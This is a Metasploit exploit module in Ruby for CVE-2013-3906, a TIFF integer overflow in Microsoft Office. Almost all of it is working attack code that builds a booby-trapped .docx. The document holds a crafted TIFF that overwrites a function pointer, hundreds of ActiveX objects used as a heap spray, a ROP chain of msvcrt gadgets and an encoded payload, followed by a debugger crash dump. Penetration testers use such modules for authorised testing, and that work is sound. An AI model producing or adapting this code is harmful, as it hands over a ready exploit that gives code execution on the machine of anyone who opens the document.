## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex/zip' require 'nokogiri' module ::Nokogiri module XML class Builder # # Some XML documents don't declare the namespace before referencing, but Nokogiri requires one. # So here's our hack to get around that by adding a new custom method to the Builder class # def custom_root(ns) e = @parent.create_element(ns) e.add_namespace_definition(ns, "href") @ns = e.namespace_definitions.find { |x| x.prefix == ns.to_s } return self end end end end class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Tagged Image File Format (TIFF) Integer Overflow", 'Description' => %q{ This module exploits a vulnerability found in Microsoft's Tagged Image File Format. It was originally discovered in the wild, targeting Windows XP and Windows Server 2003 users running Microsoft Office, specifically in the Middle East and South Asia region. The flaw is due to a DWORD value extracted from the TIFF file that is embedded as a drawing in Microsoft Office, and how it gets calculated with user-controlled inputs, and stored in the EAX register. The 32-bit register will run out of storage space to represent the large vlaue, which ends up being 0, but it still gets pushed as a dwBytes argumenet (size) for a HeapAlloc call. The HeapAlloc function will allocate a chunk anyway with size 0, and the address of this chunk is used as the destination buffer of a memcpy function, where the source buffer is the EXIF data (an extended image format supported by TIFF), and is also user-controlled. A function pointer in the chunk returned by HeapAlloc will end up being overwritten by the memcpy function, and then later used in OGL!GdipCreatePath. By successfully controlling this function pointer, and the memory layout using ActiveX, it is possible to gain arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Some dude wrote it and deployed in the wild, but Haifei Li spotted it 'sinn3r' # Metasploit ], 'References' => [ [ 'CVE', '2013-3906' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2896666' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx' ] ], 'Payload' => { 'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] "\x83\xC0\x08" + # add eax, byte 8 "\x8b\x20" + # mov esp, [eax] "\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "process", 'PrependMigrate' => true }, 'Platform' => 'win', 'Targets' => [ # XP SP3 + Office 2010 Standard (14.0.6023.1000 32-bit) ['Windows XP SP3 with Office Starndard 2010', {}], ], 'Privileged' => false, 'DisclosureDate' => "Nov 5 2013", # Microsoft announcement 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [true, 'The docx file', 'msf.docx']), ], self.class) end # # Creates a TIFF that triggers the overflow # def make_tiff # TIFF Header: # TIFF ID = 'II' (Intel order) # TIFF Version = 42d # Offset of FID = 0x000049c8h # # Image Directory: # Number of entries = 17d # Entry[0] NewSubFileType = 0 # Entry[1] ImageWidth = 256d # Entry[2] ImageHeight = 338d # Entry[3] BitsPerSample = 8 8 8 # Entry[4] Compression = JPEG (6) # Entry[5] Photometric Interpretation = RGP # Entry[6] StripOffsets = 68 entries (349 bytes) # Entry[7] SamplesPerPixel = 3 # Entry[8] RowsPerStrip = 5 # Entry[9] StripByteCounts = 68 entries (278 bytes) # Entry[10] XResolution = 96d # Entry[11] YResolution = 96d # Entry[12] Planar Configuration = Clunky # Entry[13] Resolution Unit = Inch # Entry[14] Predictor = None # Entry[15] JPEGInterchangeFormatLength = 5252h (1484h) # Entry[16] JPEGInterchangeFormat = 13636d # Notes: # These values are extracted from the file to calculate the HeapAlloc size that result in the overflow: # - JPEGInterchangeFormatLength # - DWORD at offset 3324h (0xffffb898), no documentation for this # - DWORDS after offset 3328h, no documentation for these, either. # The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy # The trigger is really a TIF file, but is named as a JPEG in the docx package buf = '' path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg") ::File.open(path, "rb") do |f| buf = f.read end # Gain control of the call [eax+50h] instruction # XCHG EAX, ESP; RETN msvcrt buf[0x4874, 4] = [0x200F0700-0x50].pack('V') buf end # # Generates a payload # def get_rop_payload p = '' p << [0x77c15ed5].pack('V') # XCHG EAX, ESP msvcrt p << generate_rop_payload('msvcrt','',{'target'=>'xp'}) p << payload.encoded block = p block << rand_text_alpha(1024 - 80 - p.length) block << [ 0x77c34fbf, 0x200f0704 ].pack("V") # pop esp # ret # from msvcrt block << rand_text_alpha(1024 - block.length) buf = '' while (buf.length < 0x80000) buf << block end buf end # # Creates an ActiveX bin that will be used as a spray in Office # def make_activex_bin # # How an ActiveX bin is referred: # document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin # Every bin is a Microsoft Compound Document File: # http://www.openoffice.org/sc/compdocfileformat.pdf # The bin file mscd = '' mscd << [0xe011cfd0].pack('V') # File identifier (first 4 byte) mscd << [0xe11ab1a1].pack('V') # File identifier (second 4 byte) mscd << [0x00000000].pack('V') * 4 # Unique Identifier mscd << [0x003e].pack('v') # Revision number mscd << [0x0003].pack('v') # Version number mscd << [0xfffe].pack('v') # Byte order: Little-Endian mscd << [0x0009].pack('v') # Sector size mscd << [0x0006].pack('v') # Size of a short-sector mscd << "\x00" * 10 # Not used mscd << [0x00000001].pack('V') # Total number of sectors mscd << [0x00000001].pack('V') # SecID for the first sector mscd << [0x00000000].pack('V') # Not used mscd << [0x00001000].pack('V') # Minimum size of a standard stream mscd << [0x00000002].pack('V') # Sec ID of first sector mscd << [0x00000001].pack('V') # Total number of sectors for the short-sector table mscd << [0xfffffffe].pack('V') # SecID of first sector of the mastser sector table mscd << [0x00000000].pack('V') # Total number of sectors for master sector talbe mscd << [0x00000000].pack('V') # SecIDs mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs mscd[0x200, 4] = [0xfffffffd].pack('V') mscd[0x204, 12] = [0xfffffffe].pack('V') * 3 mscd << Rex::Text.to_unicode("Root Entry") mscd << [0x00000000].pack('V') * 11 mscd << [0x0016].pack('v') # Valid range of the previous char array mscd << "\x05" # Type of entry (Root Storage Entry) mscd << "\x00" # Node colour of the entry (red) mscd << [0xffffffff].pack('V') # DirID of the left child node mscd << [0xffffffff].pack('V') # DirID of the right child node mscd << [0x00000001].pack('V') # DirID of the root node entry mscd << [0x1efb6596].pack('V') mscd << [0x11d1857c].pack('V') mscd << [0xc0006ab1].pack('V') mscd << [0x283628f0].pack('V') mscd << [0x00000000].pack('V') * 3 mscd << [0x287e3070].pack('V') mscd << [0x01ce2654].pack('V') mscd << [0x00000003].pack('V') mscd << [0x00000100].pack('V') mscd << [0x00000000].pack('V') mscd << Rex::Text.to_unicode("Contents") mscd << [0x00000000].pack('V') * 12 mscd << [0x01020012].pack('V') mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 10 mscd << [0x000000e4].pack('V') mscd << [0x00000000].pack('V') * 18 mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 29 mscd << [0xffffffff].pack('V') * 3 mscd << [0x00000000].pack('V') * 12 mscd << [0x00000001].pack('V') mscd << [0x00000002].pack('V') mscd << [0x00000003].pack('V') mscd << [0xfffffffe].pack('V') mscd << [0xffffffff].pack('V') * 32 #52 mscd << [0x77c34fbf].pack('V') # POP ESP # RETN mscd << [0x200f0704].pack('V') # Final payload target address to begin the ROP mscd << [0xffffffff].pack('V') * 18 mscd << @rop_payload mscd end # # Creates an activeX[num].xml file # @param rid [String] The relationship ID (example: rId1) # @return [String] XML document # def make_activex_xml(rid) attrs = { 'ax:classid' => "{1EFB6596-857C-11D1-B16A-00C0F0283628}", 'ax:license' => "9368265E-85FE-11d1-8BE3-0000F8754DA1", 'ax:persistence' => "persistStorage", 'r:id' => "rId#{rid.to_s}", 'xmlns:ax' => "http://schemas.microsoft.com/office/2006/activeX", 'xmlns:r' => @schema } md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.custom_root("ax") xml.ocx(attrs) end builder.to_xml(:indent => 0) end # # Creates an activeX[num].xml.rels # @param relationships [Array] A collection of hashes with each containing: # :id, :type, :target # @return [String] XML document # def make_activex_xml_reals(rid, target_bin) acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary" md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do xml.Relationship({:Id=>"rId#{rid.to_s}", :Type=>acx_type, :Target=>target_bin}) end end builder.to_xml(:indent => 0) end # # Creates a document.xml.reals file # @param relationships [Array] A collection of hashes with each containing: # :id, :type, and :target # @return [String] XML document # def make_doc_xml_reals(relationships) md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do relationships.each do |r| xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:target]}) end end end builder.to_xml(:indent => 0) end # # Creates a _rels/.rels file # def init_rels(doc_xml, doc_props) rels = [] rels << doc_xml rels << doc_props rels = rels.flatten md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/relationships") do rels.each do |r| xml.Relationship({:Id=>"rId#{r[:id].to_s}", :Type=>r[:type], :Target=>r[:fname].gsub(/^\//, '')}) end end end { :fname => "_rels/.rels", :data => builder.to_xml(:indent => 0) } end # # Creates a run element for chart # @param xml [Element] # @param rid [String] # def create_chart_run_element(xml, rid) drawingml_schema = "http://schemas.openxmlformats.org/drawingml/2006" xml.r do xml.rPr do xml.noProof xml.lang({'w:val' => "en-US"}) end xml.drawing do xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do xml['wp'].extent({'cx'=>'1', 'cy'=>'1'}) xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"}) xml['wp'].docPr({'id'=>rid.to_s, 'name' => "drawing #{rid.to_s}"}) xml['wp'].cNvGraphicFramePr xml['a'].graphic do xml['a'].graphicData({'uri'=>"#{drawingml_schema}/chart"}) do xml['c'].chart({'r:id'=>"rId#{rid.to_s}"}) end end end end end end # # Creates a run element for ax # @param xml [Element] # @param rid [String] # def create_ax_run_element(xml, rid) shape_attrs = { 'id' => "_x0000_i10#{rid.to_s}", 'type' => "#_x0000_t75", 'style' => "width:1pt;height:1pt", 'o:ole' => "" } control_attrs = { 'r:id' => "rId#{rid.to_s}", 'w:name' => "TabStrip#{rid.to_s}", 'w:shapeid' =>"_x0000_i10#{rid.to_s}" } xml.r do xml.object({'w:dxaOrig'=>"1440", 'w:dyaOrig'=>"1440"}) do xml['v'].shape(shape_attrs) xml['w'].control(control_attrs) end end end # # Creates a pic run element # @param xml [Element] # @param rid [String] # def create_pic_run_element(xml, rid) drawinxml_schema = "http://schemas.openxmlformats.org/drawingml/2006" xml.r do xml.rPr do xml.noProof xml.lang({'w:val'=>"en-US"}) end xml.drawing do xml['wp'].inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do xml.extent({'cx'=>'1', 'cy'=>'1'}) xml['wp'].effectExtent({'l'=>"1", 't'=>"0", 'r'=>"0", 'b'=>"0"}) xml['wp'].docPr({'id'=>rid.to_s, 'name'=>"image", 'descr'=>"image.jpeg"}) xml['wp'].cNvGraphicFramePr do xml['a'].graphicFrameLocks({'xmlns:a'=>"#{drawinxml_schema}/main", 'noChangeAspect'=>"1"}) end xml['a'].graphic({'xmlns:a'=>"#{drawinxml_schema}/main"}) do xml['a'].graphicData({'uri'=>"#{drawinxml_schema}/picture"}) do xml['pic'].pic({'xmlns:pic'=>"#{drawinxml_schema}/picture"}) do xml['pic'].nvPicPr do xml['pic'].cNvPr({'id'=>rid.to_s, 'name'=>"image.jpeg"}) xml['pic'].cNvPicPr end xml['pic'].blipFill do xml['a'].blip('r:embed'=>"rId#{rid.to_s}", 'cstate'=>"print") xml['a'].stretch do xml['a'].fillRect end end xml['pic'].spPr do xml['a'].xfrm do xml['a'].off({'x'=>"0", 'y'=>"0"}) xml['a'].ext({'cx'=>"1", 'cy'=>"1"}) end xml['a'].prstGeom({'prst' => "rect"}) do xml['a'].avLst end end end end end end end end end # # Creates a document.xml file # @param pre_defs [Array] # @param activex [Array] # @param tiff_file [Array] # @return [String] XML document # def init_doc_xml(last_rid, pre_defs, activex, tiff_file) # Get all the required pre-defs chart_rids = [] pre_defs.select { |e| chart_rids << e[:id] if e[:fname] =~ /\/word\/charts\//} # Get all the ActiveX RIDs ax_rids = [] activex.select { |e| ax_rids << e[:id] } # Get the TIFF RID tiff_rid = tiff_file[:id] # Documentation on how this is crafted: # http://msdn.microsoft.com/en-us/library/office/gg278308.aspx doc_attrs = { 'xmlns:ve' => "http://schemas.openxmlformats.org/markup-compatibility/2006", 'xmlns:o' => "urn:schemas-microsoft-com:office:office", 'xmlns:r' => @schema, 'xmlns:m' => "http://schemas.openxmlformats.org/officeDocument/2006/math", 'xmlns:v' => "urn:schemas-microsoft-com:vml", 'xmlns:wp' => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing", 'xmlns:w10' => "urn:schemas-microsoft-com:office:word", 'xmlns:w' => "http://schemas.openxmlformats.org/wordprocessingml/2006/main", 'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml", 'xmlns:a' => "http://schemas.openxmlformats.org/drawingml/2006/main", 'xmlns:c' => "http://schemas.openxmlformats.org/drawingml/2006/chart" } p_attrs_1 = {'w:rsidR' => "00F8254F", 'w:rsidRDefault' => "00D15BD0" } p_attrs_2 = {'w:rsidR' => "00D15BD0", 'w:rsidRPr' =>"00D15BD0", 'w:rsidRDefault' => "00D15BD0" } md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.custom_root("w") xml.document(doc_attrs) do xml.body do # Paragraph (ActiveX) xml.p(p_attrs_1) do # Paragraph properties xml.pPr do # Run properties xml.rPr do xml.lang({'w:val' => "en-US"}) end end ax_rids.each do |rid| create_ax_run_element(xml, rid) end end xml.p(p_attrs_2) do xml.pPr do xml.rPr do xml['w'].lang({'w:val'=>"en-US"}) end end # Charts chart_rids.each do |rid| create_chart_run_element(xml, rid) end # TIFF create_pic_run_element(xml, tiff_rid) end end end end { :id => (last_rid + 1).to_s, :type => "#{@schema}/officeDocument", :fname => "/word/document.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml", :xml => builder.to_xml(:indent => 0) } end # # Creates a [Content.Types].xml file located in the parent directory # @param overrides [Array] A collection of hashes with each containing # the :PartName and :ContentType info # @return [String] XML document # def make_contenttype_xml(overrides) contenttypes = [ { :Extension => "rels", :ContentType => "application/vnd.openxmlformats-package.relationships+xml" }, { :Extension => "xml", :ContentType => "application/xml" }, { :Extension => "jpeg", :ContentType => "image/jpeg" }, { :Extension => "bin", :ContentType => "application/vnd.ms-office.activeX" }, { :Extension => "xlsx", :ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet" } ] md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>") builder = ::Nokogiri::XML::Builder.with(md) do |xml| xml.Types({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do # Default extensions contenttypes.each do |contenttype| xml.Default(contenttype) end # Additional overrides overrides.each do |override| override_attrs = { :PartName => override[:PartName] || override[:fname], :ContentType => override[:ContentType] } xml.Override(override_attrs) end end end builder.to_xml(:indent => 0) end # # Pre-define some items that will be used in .rels # def init_doc_props(last_rid) items = [] items << { :id => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "/docProps/app.xml", :content_type => "application/vnd.openxmlformats-officedocument.extended-properties+xml" } items << { :id => (last_rid += 1), :type => "http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties", :fname => "/docProps/core.xml", :content_type => "application/vnd.openxmlformats-package.core-properties+xml" } return last_rid, items end # # Pre-define some items that will be used in document.xml.rels # def init_doc_xml_rels_items(last_rid) items = [] items << { :id => (last_rid += 1), :type => "#{@schema}/styles", :fname => "/word/styles.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/settings", :fname => "/word/settings.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "/word/webSettings.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/fontTable", :fname => "/word/fontTable.xml", :content_type => "application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/theme", :fname => "/word/theme/theme1.xml", :content_type => "application/vnd.openxmlformats-officedocument.theme+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart1.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart2.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart3.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart4.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart5.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } items << { :id => (last_rid += 1), :type => "#{@schema}/chart", :fname => "/word/charts/chart6.xml", :content_type => "application/vnd.openxmlformats-officedocument.drawingml.chart+xml" } return last_rid, items end # # Manually create everything manually in the ActiveX directory # def init_activex_files(last_rid) activex = [] 0x250.times do |i| id = (last_rid += 1) bin = { :fname => "/word/activeX/activeX#{id.to_s}.bin", :bin => make_activex_bin } xml = { :fname => "/word/activeX/activeX#{id.to_s}.xml", :xml => make_activex_xml(id) } rels = { :fname => "/word/activeX/_rels/activeX#{id.to_s}.xml.rels", :rels => make_activex_xml_reals(id, "activeX#{id.to_s}.bin") } ct = "application/vnd.ms-office.activeX+xml" type = "#{@schema}/control" activex << { :id => id, :bin => bin, :xml => xml, :rels => rels, :content_type => ct, :type => type } end return last_rid, activex end # # Create a [Content_Types.xml], each node contains these attributes: # :PartName The path to an ActiveX XML file # :ContentType The contenttype of the XML file # def init_contenttype_xml_file(*items) overrides = [] items.each do |item| item.each do |obj| overrides << {:PartName => obj[:fname] || obj[:xml][:fname], :ContentType => obj[:content_type]} end end {:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)} end # # Creates the tiff file # def init_tiff_file(last_rid) id = last_rid + 1 tiff_data = { :id => id, :fname => "/word/media/image1.jpeg", :data => make_tiff, :type => "#{@schema}/image" } return id, tiff_data end # # Create the document.xml.rels file # def init_doc_xml_reals_file(pre_defs, activex, tiff) reals = [] pre_defs.each do |obj| reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^\/word\//, '')} end activex.each do |obj| reals << {:id => obj[:id], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^\/word\//, '')} end reals << {:id => tiff[:id], :type => tiff[:type], :target => tiff[:fname].gsub(/^\/word\//, '')} {:fname => "/word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)} end # # Loads a fiile # def read_file(fname) buf = '' ::File.open(fname, "rb") do |f| buf << f.read end buf end # # Packages everything to docx # def make_docx(path) print_status("Initializing files...") last_rid = 0 last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid) last_rid, activex = init_activex_files(last_rid) last_rid, doc_props = init_doc_props(last_rid) last_rid, tiff_file = init_tiff_file(last_rid) doc_xml = init_doc_xml(last_rid, doc_xml_rels_items, activex, tiff_file) ct_xml_file = init_contenttype_xml_file(activex, doc_xml_rels_items, doc_props, [doc_xml]) doc_xml_reals_file = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file) rels_xml = init_rels(doc_xml, doc_props) zip = Rex::Zip::Archive.new Dir["#{path}/**/**"].each do |file| p = file.sub(path+'/','') if File.directory?(file) print_status("Packing directory: #{p}") zip.add_file(p) else # Avoid packing image1.jpeg because we'll load it separately if file !~ /media\/image1\.jpeg/ print_status("Packing file: #{p}") zip.add_file(p, read_file(file)) end end end print_status("Packing ActiveX controls...") activex.each do |ax| ax_bin = ax[:bin] ax_xml = ax[:xml] ax_rels = ax[:rels] vprint_status("Packing file: #{ax_bin[:fname]}") zip.add_file(ax_bin[:fname], ax_bin[:bin]) vprint_status("Packing file: #{ax_xml[:fname]}") zip.add_file(ax_xml[:fname], ax_xml[:xml]) vprint_status("Packing file: #{ax_rels[:fname]}") zip.add_file(ax_rels[:fname], ax_rels[:rels]) end print_status("Packing file: #{ct_xml_file[:fname]}") zip.add_file(ct_xml_file[:fname], ct_xml_file[:data]) print_status("Packing file: #{tiff_file[:fname]}") zip.add_file(tiff_file[:fname], tiff_file[:data]) print_status("Packing file: #{doc_xml[:fname]}") zip.add_file(doc_xml[:fname], doc_xml[:xml]) print_status("Packing file: #{rels_xml[:fname]}") zip.add_file(rels_xml[:fname], rels_xml[:data]) print_status("Packing file: #{doc_xml_reals_file[:fname]}") zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data]) zip.pack end def exploit @rop_payload = get_rop_payload @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships" path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906") docx = make_docx(path) file_create(docx) end end =begin 0:000> r eax=414242f4 ebx=00000000 ecx=22a962a0 edx=44191398 esi=22c4d338 edi=1cfe5dc0 eip=44023a2a esp=0011fd8c ebp=0011fd98 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286 OGL!GdipCreatePath+0x58: 44023a2a ff5050 call dword ptr [eax+50h] ds:0023:41424344=???????? 0:000> k ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 0011fd98 437a9681 OGL!GdipCreatePath+0x58 0011fdc8 437b11b0 gfx+0x9681 0011fdf0 422b56e5 gfx+0x111b0 0011fe18 422a99f7 oart!Ordinal3584+0x86 0011fed8 422a9921 oart!Ordinal7649+0x2b2 0011fef0 422a8676 oart!Ordinal7649+0x1dc 001200bc 422a85a8 oart!Ordinal4145+0x199 001200fc 424898c6 oart!Ordinal4145+0xcb 001201bc 42489b56 oart!Ordinal3146+0xb15 001202cc 422a37df oart!Ordinal3146+0xda5 00120330 422a2a73 oart!Ordinal2862+0x14e 00120360 317821a9 oart!Ordinal2458+0x5e 001203bc 31782110 wwlib!GetAllocCounters+0x9bd51 001204a4 3177d1f2 wwlib!GetAllocCounters+0x9bcb8 001207ec 3177caef wwlib!GetAllocCounters+0x96d9a 0012088c 3177c7a0 wwlib!GetAllocCounters+0x96697 001209b0 3175ab83 wwlib!GetAllocCounters+0x96348 001209d4 317569e0 wwlib!GetAllocCounters+0x7472b 00120ad4 317540f5 wwlib!GetAllocCounters+0x70588 00120afc 3175400b wwlib!GetAllocCounters+0x6dc9d To-do: Turn the docx packaging into a mixin. Good luck with that. =end